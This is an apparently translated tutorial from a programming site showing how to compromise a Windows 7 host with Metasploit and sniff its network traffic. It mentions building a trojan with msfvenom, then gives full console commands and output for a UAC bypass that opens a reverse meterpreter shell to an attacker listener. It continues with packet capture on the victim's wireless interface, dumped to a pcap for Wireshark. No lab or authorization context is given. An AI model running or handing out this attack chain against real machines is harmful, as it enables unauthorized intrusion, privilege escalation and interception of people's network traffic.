
Capturing a host's packets on an internal network with msf

程序员文章站 2022-07-10 10:26:46

1. Use msf: generate the trojan program with msfvenom. Tested successfully on Win7 SP1. (http://www.2cto.com/Article/201304/199847.html)

2. Use the sniffer module

On Win7 one extra step is needed: getting past UAC. Here exploit/windows/local/bypassuac is used.

There is also another tool that can be used, though it has not been tested: Win7Elevate32.exe

Bypass UAC: http://www.metasploit.com/modules/exploit/windows/local/bypassuac

meterpreter > background
[*] Backgrounding session 6...
msf  exploit(handler) > use exploit/windows/local/bypassuac
msf  exploit(bypassuac) > show options

Module options (exploit/windows/local/bypassuac):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  4                yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.0.133    yes       The listen address
   LPORT     443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows

msf  exploit(bypassuac) > set SESSION 6
SESSION => 6
msf  exploit(bypassuac) > exploit

[*] Started reverse handler on 192.168.0.133:443
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (752128 bytes) to 192.168.0.103
[*] Meterpreter session 7 opened (192.168.0.133:443 -> 192.168.0.103:2309) at 2013-04-02 00:34:51 +0800

meterpreter >
meterpreter > pwd
C:\Windows\System32

meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces

1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Intel(R) 82567LM Gigabit Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
3 - 'VMware Virtual Ethernet Adapter for VMnet1' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
4 - '11b/g/n  Wireless LAN Mini-PCI Express Adapter II' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
5 - 'VMware Virtual Ethernet Adapter for VMnet8' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_start 4
[*] Capture started on interface 4 (50000 packet buffer)
meterpreter > sniffer_stats 4
[*] Capture statistics for interface 4
    packets: 2
    bytes: 115
meterpreter > sniffer_stats 4
[*] Capture statistics for interface 4
    packets: 173
    bytes: 109330
meterpreter > sniffer_dump 4 /tmp/mydump.cap
[*] Flushing packet capture buffer for interface 4...
[*] Flushed 225 packets (122383 bytes)
[*] Downloaded 100% (122383/122383)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/mydump.cap
meterpreter > sniffer_stop 4
[*] Capture stopped on interface 4
[*] There are 32 packets (6987 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter >

Finally, the collected network packets can be opened in Wireshark for viewing, to find the content of interest.